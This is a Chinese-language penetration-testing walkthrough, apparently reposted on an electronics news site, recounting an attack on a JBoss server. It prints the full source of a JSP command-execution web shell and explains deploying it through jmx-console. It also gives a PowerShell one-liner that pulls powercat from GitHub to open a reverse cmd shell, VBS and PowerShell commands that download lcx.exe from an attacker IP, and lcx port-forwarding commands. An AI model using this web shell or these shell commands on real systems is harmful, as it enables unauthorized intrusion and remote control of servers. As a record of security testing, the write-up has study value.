一.前言
最近做渗透测试中遇到一个jboss的站,在其中学到一些在乙方工作挺有用的技巧(这次测试是进过授权测试)在次分享一下
二.信息收集
先通过namp进行扫描,同时进行目录扫描,发现8080/jmx-console/,发现是jboss的站,百度到jboss可以部署war包getshell,访问http://xxxx:8080//jmx-console/
三.漏洞利用
全局搜索jboss.system,点击进入
1.制作war包把木马文件gg.jsp(我是一个直接执行命令代码)用压缩软件压缩为zip,然后更改后缀为war,然后将该war上传到互联网上能够访问的网
站上
//gg.jsp <%@ page contentType="text/html;charset=big5" session="false" import="java.io.*" %> <html> <head> <title>title> <meta http-equiv="Content-Type" content="text/html; charset=big5"> head> <body> <% Runtime runtime = Runtime.getRuntime(); Process process =null; String line=null; InputStream is =null; InputStreamReader isr=null; BufferedReader br =null; String ip=request.getParameter("cmd"); try { process =runtime.exec(ip); is = process.getInputStream(); isr=new InputStreamReader(is); br =new BufferedReader(isr); out.println("
"); while( (line = br.readLine()) != null ) { out.println(line); out.flush(); } out.println(""); is.close(); isr.close(); br.close(); } catch(IOException e ) { out.println(e); runtime.exit(1); } %> body> html> 我这里就用python 简单创建个ftp服务(这也是python的一个巧用)
python -m SimpleHTTPServer 8589
2.进入jboss.system页面找到如下,填入远程的war文件地址
成功部署的界面如下
3.访问shell地址,并执行命令
四.进一步渗透
1.在获得php shell的基础上,我们需要一个真正的cmd shell,这样有利于操作,进过nmap扫描,发现是windows,我们可以通过powershell进行shell反弹powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p port -e cmd
本地监听,成功获取一个cmd shell,接下来就是提权了
2.在cmd 中查看端口开放信息,3389和445都开放了 想到了永恒之蓝打一波,先看看打没打永恒之蓝的补丁,和看看系统信息,发现打了很多补丁
可以通过如下链接查看补丁编号 网址:https://micro8.gitbook.io/micro8/contents-1/1-10/1windows-ti-quan-kuai-su-cha-zhao-exp 查找永恒之蓝补丁编号进行比对发现该目标机器并没打补丁
3.看端口扫描结果,3389过滤了,445也过滤了,只有端口转发再打了
4.先在shell中查看有那些任务,看看有没杀毒软件,初看没有,但后来才发现了,居然有卡巴斯基
5.没事就到处浏览目录查看内容(发现google账号密码居然记录在txt文件中),发现任何目录都能浏览和看信息,就怀疑这个用户的权限,赶紧看了哈…居然是administrator 组的,那提权就不用了涩,但还是想3389连进去
6.打算用vbs下载一个lcx或者EarthWorm进行端口转发,vbs下载代码,一般下载在C:WindowsTemp目录下,可读可写vbs下载代码
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs echo Post.Open "GET","http://ip/lcxx/lcx.exe",0 >>download.vbs echo Post.Send() >>download.vbs echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs echo aGet.Mode = 3 >>download.vbs echo aGet.Type = 1 >>download.vbs echo aGet.Open() >>download.vbs echo aGet.Write(Post.responseBody) >>download.vbs echo aGet.SaveToFile "C:WindowsTemp2.txt",2 >>download.vbs
powershell 下载代码powershell (new-object System.Net.WebClient).DownloadFile( 'http://ip:7667/lcxx/lcx.exe','C:WindowsTemp2.txt')
7.当自己写进去了后,更名为exe执行的时候,被杀了,最后又看了下任务,才发现卡巴斯基,然后就一直被卡在这里8.lcx命令如下lcx 命令//被攻击机器 lcx -slave 自己外网ip 51 内网ip 3389 //攻击机器 lcx.exe -listen 51 9090
由于防火墙限制,部分端口如3389无法通过防火墙,此时可以将该目标主机的3389端口透传到防火墙允许的其他端口,如53端口.lcx -tran 53 目标主机ip 3389
总结
虽然暂时没有成功,但从中还是学到许多渗透知识,也明白了实战能提高许多技术。不足就是知识不够,还需努力。
审核编辑 :李倩
声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。
举报投诉
-
漏洞
+关注
关注
0文章
194浏览量
15117 -
渗透
+关注
关注
0文章
19浏览量
6237 -
Shell
+关注
关注
1文章
358浏览量
22903
原文标题:实战|一次不完美的Jboss渗透
文章出处:【微信号:菜鸟学信安,微信公众号:菜鸟学信安】欢迎添加关注!文章转载请注明出处。
发布评论请先 登录
相关推荐
iOS5.1不完美越狱最详细图文教程
雪(Redsn0w)0.9.10 b6能够帮助那些不小心点了iOS5.1升级按钮的果粉暂时解决燃煤之急。下面小编就第一时间为大家带来iOS5.1不完美越狱教程(适用于 iPhone 4、iPad 1
发表于 03-13 16:43
书写什么格式的代码 才具有最为完美的风格
书写什么格式的代码 才具有最为完美的风格, 隔在一边时间长了连自已也看不懂了.请教高手: 当一个只能完成一个独立任务的代码完成后,要在其中加入新的任务,最终却是
发表于 05-26 16:07
不完美的伴侣机器人?
在与人类交互的过程中,表现出与人类相似的不完美,我们就有信心建立起长期的人机关系。” 一位研究员在接受BBC采访时说,机器人的开发取决于用途,工业机器人当然需要很完美,我们不希望它们犯错误。但是对伴侣机器人来说,它们的行为很重
发表于 12-28 14:42
如何在程序中以编码方式来控制JBOSS
上一节已经学习了CLI命令行来控制JBOSS,如果想在程序中以编码方式来控制JBOSS,可以参考下面的代码,实际上在前面的文章,用代码控制Jboss上的DataSource,已经有所接
发表于 08-05 06:24
让STM32完美的处理字符串
今天因为想让STM32完美的处理字符串,所以就想着让STM32嵌入lua,本来想用f103c8t6,但是一编译就提示内存不足......所以单片机的型号选择的\我下载到了RBT6的芯片上测试的先说
发表于 08-20 08:11
一次泵变流量系统技术有何应用
一次泵变流量系统技术的应用研究一次泵变流量系统(Variable-Primary-Flow System,以下简称VPF系统)诞生的历史并不长,空调行业人士针对该系统的认识存在一渐进接受的过程
发表于 09-09 07:25
iPad性能测试:速度飞快 但并不完美
iPad性能测试:速度飞快 但并不完美
北京时间4月4日,苹果iPad在北美正式开卖。实机到手,之前很多人猜测的一些细节疑问也自然迎刃而解,例如iPa
发表于 04-07 09:39
•1438次阅读
评论